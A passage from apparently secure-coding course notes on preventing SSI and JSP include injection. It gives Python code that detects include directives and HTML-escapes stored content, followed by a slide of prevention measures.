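SSI_DIRECTIVE = re.compile(r"<!--#\s*(?P<name>[A-Za-z]+)(?P<attrs>[^>]*?)-->", re.S)
# <jsp:include page="..." /> and the looser form shown on the slide
JSP_INCLUDE = re.compile(r"<jsp:include\b(?P<attrs>[^>]*)>", re.I)
ATTRIBUTE = re.compile(r"""([A-Za-z_]+)\s*=\s*(["'])(.*?)\2""", re.S)


def _attributes(text):
    """Parse name="value" pairs; names are lower-cased for comparison."""
    return {k.lower(): v for k, _, v in ATTRIBUTE.findall(text)}


def find_server_side_includes(content):
    """Return every SSI directive or JSP include action found in content."""
    hits = []
    for m in SSI_DIRECTIVE.finditer(content):
        hits.append({"kind": "ssi", "directive": m.group("name").lower(),
                     "attrs": _attributes(m.group("attrs")), "raw": m.group(0)})
    for m in JSP_INCLUDE.finditer(content):
        hits.append({"kind": "jsp", "directive": "include",
                     "attrs": _attributes(m.group("attrs")), "raw": m.group(0)})
    return hits


def neutralize(content):
    """Encode the content as HTML text before it is stored.  With '<' turned into
    '&lt;' no include directive survives to be evaluated, while a later visitor's
    browser still displays the characters the user typed."""
    return html.escape(content, quote=True)
```

Detection alone only tells you an attempt happened; the encoding step is what keeps the stored content inert on every future request, which is the persistence the SSI slide warns about. The check has to run before the content is written into anything the SSI handler or JSP compiler will process, not at display time.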

Page 54

JSP Injection Prevention

Prefer the static include directive <%@ include … %>, which is resolved when the page is compiled and cannot be influenced by request data
Don't allow file inclusion outside of the server, enforced via Java 2 security policies
Firewall rules to block outbound requests from the server
Input validation in the application code
Choose portal software that does not require dynamic includes or code execution